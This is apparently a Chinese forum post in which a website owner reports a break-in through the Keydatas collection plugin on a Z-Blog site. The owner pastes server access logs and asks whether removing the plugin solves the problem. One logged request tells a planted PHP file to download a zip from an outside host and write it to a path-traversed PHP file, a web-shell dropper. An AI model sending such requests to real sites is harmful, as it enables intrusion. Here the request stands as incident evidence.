网站被黑了,怎么办?
2025/08/12 13:05:35
今天发现网站别人发布了一篇文章标题为:1的记录这肯定不是我发的,看了宝塔防篡改的,有一条拦截记录/www/wwwroot/www.xxxxx.com/zb_users/upload/ad10523.icu/ccsl.php
还好被拦截成功了,没有创建成功这个php文件,随后网站日志显示:一直访问了我简数采集插件的链接并且带有他几个外链,还有他创建的那个文件,幸好是被防篡改拦截掉了求大神帮我分析,是不是把简数插件卸载,就没有问题呢?
还好被拦截成功了,没有创建成功这个php文件,随后网站日志显示:
- 103.233.8.96 - - [11/Aug/2025:16:19:29 +0800] "POST /zb_users/plugin/keydatas/keydatas_zblog.php?__kds_flag=post HTTP/2.0" 200 101 "https://www.waimaopeixun.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
- 103.233.8.96 - - [11/Aug/2025:16:19:47 +0800] "GET /zb_users/upload/ad10523.icu HTTP/2.0" 404 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"103.233.8.96 - - [11/Aug/2025:16:19:45 +0800] "GET /zb_users/upload/ad10523.icu/ccsl.php HTTP/2.0" 404 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"103.233.8.96 - - [11/Aug/2025:16:19:43 +0800] "GET /zb_users/upload/ad10523.icu/ccsl.php HTTP/2.0" 404 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"103.233.8.96 - - [11/Aug/2025:16:19:37 +0800] "GET /zb_users/upload/ad10523.icu/ccsl.php?&1=http://www.r165.com/aoye/1.zip&2=../../Zml.php HTTP/2.0" 403 708 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"103.233.8.96 - - [11/Aug/2025:16:19:29 +0800] "GET /favicon.ico HTTP/2.0" 200 1919 "/zb_users/plugin/keydatas/keydatas_zblog.php?__kds_flag=post" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"